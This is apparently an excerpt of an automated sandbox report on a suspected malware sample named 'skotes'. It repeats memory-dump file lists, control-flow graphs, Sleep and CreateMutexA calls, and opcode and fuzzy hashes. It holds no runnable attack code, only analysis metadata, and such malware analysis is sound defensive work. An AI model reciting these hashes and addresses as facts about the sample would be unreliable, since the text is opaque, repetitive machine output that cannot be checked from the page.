                                                                                                                                                                                            • Associated: 00000002.00000002.1487025692.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487043861.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487065166.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487083690.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487110165.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487128440.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487149781.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487167064.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487185341.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487204949.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487230454.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487247568.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487264556.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487284342.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487302608.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487320510.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487339666.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487356200.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487371192.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487386011.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487401136.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487416008.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487430765.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487445085.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487466619.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487484405.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487503324.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487520463.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487540232.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487556831.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487573270.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487635756.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487650878.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487671613.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487688557.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487711172.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487727174.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                            • String ID: T2f
                                                                                                                                                                                            • API String ID: 1464230837-3713388386
                                                                                                                                                                                            • Opcode ID: ae77fa82b80ca44c9b42b7e8746cf2694903e5d3dbfb673dcf2050fbf96de888
                                                                                                                                                                                            • Instruction ID: 5d8dcf01d03a30f0a4fadb8f86bf48341a244d2f8ed461f4f4b98fefe812ab07
                                                                                                                                                                                            • Opcode Fuzzy Hash: ae77fa82b80ca44c9b42b7e8746cf2694903e5d3dbfb673dcf2050fbf96de888
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D313731B902049BEB0CDBBCDD85BAEB773DB82354F248618E014DB3D5C77559808652

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 238 609adc-609ae8 239 609aea-609af8 238->239 240 609afe-609d91 call 61d663 call 617a00 call 605c10 call 608b30 call 618220 call 617a00 call 605c10 call 608b30 call 618220 238->240 239->240 241 60a917 239->241 243 60a953-60a994 Sleep CreateMutexA 241->243 244 60a917 call 636c6a 241->244 250 60a996-60a998 243->250 251 60a9a7-60a9a8 243->251 244->243 250->251 253 60a99a-60a9a5 250->253 253->251
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 0060A963
                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00663254), ref: 0060A981
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.1486178970.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.1486079645.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486178970.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486598692.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486617811.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486658352.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486673887.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486691158.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486798163.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486817828.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486843858.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486863331.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486915608.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486930876.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486945694.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486965787.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486983847.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486999480.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487025692.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487043861.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487065166.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487083690.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487110165.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487128440.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487149781.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487167064.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487185341.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487204949.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487230454.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487247568.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487264556.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487284342.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487302608.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487320510.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487339666.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487356200.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487371192.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487386011.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487401136.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487416008.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487430765.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487445085.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487466619.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487484405.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487503324.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487520463.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487540232.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487556831.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487573270.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487635756.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487650878.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487671613.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487688557.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487711172.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487727174.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                            • String ID: T2f
                                                                                                                                                                                            • API String ID: 1464230837-3713388386
                                                                                                                                                                                            • Opcode ID: 46c6e2e435a4d5fad19fd884629a357f85b947c26495d6b82c985925217b8009
                                                                                                                                                                                            • Instruction ID: 14268730072d1e15865ab896de0dc4cf1b0de098ccf2615e6e56ba385bb09e12
                                                                                                                                                                                            • Opcode Fuzzy Hash: 46c6e2e435a4d5fad19fd884629a357f85b947c26495d6b82c985925217b8009
                                                                                                                                                                                            • Instruction Fuzzy Hash: 71216731B842009BEB1CABACEC8576EB767EFC2310F244619E404D73D6C7B59A808752

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 306 60a856-60a86e 307 60a870-60a87c 306->307 308 60a89c-60a89e 306->308 309 60a892-60a899 call 61d663 307->309 310 60a87e-60a88c 307->310 311 60a8a0-60a8a7 308->311 312 60a8a9-60a8b1 call 607d30 308->312 309->308 310->309 313 60a94e 310->313 315 60a8eb-60a916 call 6180c0 311->315 323 60a8b3-60a8bb call 607d30 312->323 324 60a8e4-60a8e6 312->324 320 60a953-60a987 Sleep CreateMutexA 313->320 321 60a94e call 636c6a 313->321 325 60a98e-60a994 320->325 321->320 323->324 330 60a8bd-60a8c5 call 607d30 323->330 324->315 327 60a996-60a998 325->327 328 60a9a7-60a9a8 325->328 327->328 331 60a99a-60a9a5 327->331 330->324 335 60a8c7-60a8cf call 607d30 330->335 331->328 335->324 338 60a8d1-60a8d9 call 607d30 335->338 338->324 341 60a8db-60a8e2 338->341 341->315
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 0060A963
                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00663254), ref: 0060A981
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.1486178970.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.1486079645.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486178970.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486598692.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486617811.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486658352.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486673887.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486691158.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486798163.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486817828.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486843858.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486863331.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486915608.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486930876.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486945694.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486965787.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486983847.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486999480.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487025692.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487043861.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487065166.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487083690.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487110165.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487128440.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487149781.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487167064.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487185341.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487204949.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487230454.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487247568.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487264556.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487284342.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487302608.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487320510.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487339666.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487356200.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487371192.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487386011.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487401136.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487416008.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487430765.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487445085.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487466619.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487484405.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487503324.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487520463.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487540232.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487556831.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487573270.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487635756.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487650878.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487671613.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487688557.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487711172.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487727174.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                            • String ID: T2f
                                                                                                                                                                                            • API String ID: 1464230837-3713388386
                                                                                                                                                                                            • Opcode ID: 991433504c7ce20fcd4488327a343a3cf0e61c62857d85019bf47d3bec35155a
                                                                                                                                                                                            • Instruction ID: afe0a8e28a7efac3d941e96f3941ae474f73123539044e9b1d3c68756d483708
                                                                                                                                                                                            • Opcode Fuzzy Hash: 991433504c7ce20fcd4488327a343a3cf0e61c62857d85019bf47d3bec35155a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 35213D317C43009AF72CA7EC999677FB253DF81340F24491AE544D73D2DAB559818197

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 283 60a34f-60a35b 284 60a371-60a39a call 61d663 283->284 285 60a35d-60a36b 283->285 291 60a3c8-60a916 call 6180c0 284->291 292 60a39c-60a3a8 284->292 285->284 286 60a93a 285->286 288 60a953-60a994 Sleep CreateMutexA 286->288 289 60a93a call 636c6a 286->289 298 60a996-60a998 288->298 299 60a9a7-60a9a8 288->299 289->288 295 60a3aa-60a3b8 292->295 296 60a3be-60a3c5 call 61d663 292->296 295->286 295->296 296->291 298->299 302 60a99a-60a9a5 298->302 302->299
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 0060A963
                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00663254), ref: 0060A981
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.1486178970.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.1486079645.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486178970.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486598692.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486617811.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486658352.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486673887.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486691158.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486798163.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486817828.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486843858.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486863331.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486915608.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486930876.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486945694.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486965787.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486983847.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486999480.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487025692.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487043861.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487065166.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487083690.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487110165.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487128440.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487149781.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487167064.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487185341.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487204949.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487230454.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487247568.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487264556.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
